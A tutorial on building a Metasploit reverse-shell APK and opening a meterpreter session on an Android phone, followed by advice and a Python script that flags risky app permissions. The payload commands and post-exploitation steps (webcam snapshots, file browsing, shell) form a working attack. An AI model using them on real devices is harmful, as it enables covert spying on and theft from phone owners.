This is a tutorial explaining how to remotely hack an Android device using Metasploit in Kali Linux. Metasploit is one of the best security tools, and it has added functionality for security testing Android devices.
In this post we will discuss how to get a remote shell on an Android device by using Metasploit in Kali Linux. We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and, once it sees it, create a fully functional remote shell to the device.
First of all, you need to know your public/external IP address and have port forwarding set up to your Kali machine if the device is not on your local network.
Creating a booby-trapped APK file
Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.
1. In Kali Linux, open a terminal prompt and type:
sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk
(Replace the LHOST value with your Kali Linux IP address and the LPORT value with the port you forwarded.)
The msfpayload command takes one of the meterpreter payloads and allows you to create a stand-alone file with it. Once this is run, a file called “app.apk” will be created.
2. Now just send this file to your Android device. I used a smartphone in this instance.
3. When the file is installed on the Android device, it will, like all apps, show you what capabilities it wants access to on your phone. It lists nearly every permission there is, I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!
Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.
4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.
5. Once Metasploit starts, type in the following to create a listener:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16   (enter your Kali IP address)
set lport 4444
Then just type “exploit” to start the handler.
6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.
7. A big button that says “ReverseTcp” will appear on your phone; when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created. On your Metasploit system you should then see the new session.
An active session is created and it drops you automatically into a meterpreter prompt.
8. From here you can type “sysinfo” to get information on the device.
9. You can see the processes running by typing “ps”.
You are done!
Now you can browse the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it. Though it may error out, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.
Typing “help” at a meterpreter prompt will list all the commands that are available. We can also run the shell command, which will drop us into a direct Terminal shell if we want:
meterpreter > shell
Process 1 created.
Channel 1 created.
If the Android phone being attacked is rooted, you can even access the stored passwords, texts or phone logs.
But if the phone is not rooted, one will not be able to access them… remotely…
This can be noted as a downside of a rooted phone!
And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an anti-virus program from a major vendor? It had no problems with letting my remote shell run.
Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make paid phone calls, this should be a red flag.
One way to avoid this situation is to keep your Google Play Store updated and install apps only from there, but not every app is available there, especially the ones used on rooted phones for somewhat unethical purposes. So the ultimate defence is to check the permissions an app requires at installation time.
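The permission check described above can be done before an APK is ever installed. The script below is an added example, not part of the original post or of Metasploit: it parses the text that the Android build-tools utility `aapt dump permissions some.apk` prints and flags requests that a game or simple utility has no business making (placing calls, sending or reading SMS, camera, microphone, contacts, location). The two sample inputs are constructed for illustration and are not the output for any real APK; the `HIGH_RISK` table and the `threshold` of three flagged permissions are my own choices.

```python
"""Flag APKs that request a suspiciously broad permission set.

Added example (not from the original post). Input is the text printed by
`aapt dump permissions <apk>`; both the newer "name='...'" style and the
older bare-name style are accepted. The sample inputs below are constructed.
"""
import re
import subprocess
import sys
from typing import Dict, List, Tuple

# Constructed sample: a "game" that asks for far more than it needs.
SAMPLE_GAME_APK = """package: com.example.game
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.SEND_SMS'
uses-permission: name='android.permission.CALL_PHONE'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
uses-permission: name='android.permission.WRITE_EXTERNAL_STORAGE'
"""

# Constructed sample: a note-taking app with a minimal permission set.
SAMPLE_BENIGN_APK = """package: com.example.notes
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.VIBRATE'
"""

# Real Android permission names; the reason text is what a reviewer sees.
# Which ones count as high risk is this example's own judgement call.
HIGH_RISK: Dict[str, str] = {
    "android.permission.CALL_PHONE": "can place phone calls, including to paid numbers",
    "android.permission.SEND_SMS": "can send SMS (premium-rate fraud, spreading)",
    "android.permission.READ_SMS": "can read SMS, including one-time passcodes",
    "android.permission.READ_CALL_LOG": "can read the phone log",
    "android.permission.CAMERA": "can take pictures without the user noticing",
    "android.permission.RECORD_AUDIO": "can record from the microphone",
    "android.permission.READ_CONTACTS": "can read the address book",
    "android.permission.ACCESS_FINE_LOCATION": "can track precise location",
}

# Matches "uses-permission: name='X'" and the older "uses-permission: X".
_PERM_RE = re.compile(r"^uses-permission(?:-sdk-23)?:\s*(?:name=')?([A-Za-z0-9_.]+)'?")
_PKG_RE = re.compile(r"^package:\s*(\S+)")


def parse_permissions(aapt_text: str) -> List[str]:
    """Return the permission names requested, in the order aapt lists them."""
    perms: List[str] = []
    for line in aapt_text.splitlines():
        match = _PERM_RE.match(line.strip())
        if match:
            perms.append(match.group(1))
    return perms


def package_name(aapt_text: str) -> str:
    """Return the package name from the 'package:' line, or a placeholder."""
    for line in aapt_text.splitlines():
        match = _PKG_RE.match(line.strip())
        if match:
            return match.group(1)
    return "<unknown-package>"


def assess(aapt_text: str, threshold: int = 3) -> Dict[str, object]:
    """Score the permission list: 'ok', 'review' or 'red-flag'."""
    perms = parse_permissions(aapt_text)
    flagged: List[Tuple[str, str]] = [(p, HIGH_RISK[p]) for p in perms if p in HIGH_RISK]
    if not flagged:
        verdict = "ok"
    elif len(flagged) < threshold:
        verdict = "review"
    else:
        verdict = "red-flag"
    return {
        "package": package_name(aapt_text),
        "requested": len(perms),
        "flagged": flagged,
        "verdict": verdict,
    }


def report(aapt_text: str) -> str:
    """Human-readable summary of assess(), one line per flagged permission."""
    result = assess(aapt_text)
    lines = [f"{result['package']}: {result['requested']} permissions requested, verdict: {result['verdict']}"]
    for perm, why in result["flagged"]:  # type: ignore[union-attr]
        lines.append(f"  - {perm}: {why}")
    return "\n".join(lines)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Real use: hand the script an APK path; aapt must be on PATH.
        out = subprocess.run(["aapt", "dump", "permissions", sys.argv[1]],
                             capture_output=True, text=True, check=True).stdout
        print(report(out))
    else:
        print(report(SAMPLE_GAME_APK))
        print(report(SAMPLE_BENIGN_APK))
```

Run it with an APK path to check a file you have been sent before installing it, or with no arguments to see the two constructed samples scored. The threshold is deliberately low: a single dangerous permission on an app whose purpose does not explain it is already worth a second look, and the point of the post is that the trojan APK asks for practically all of them.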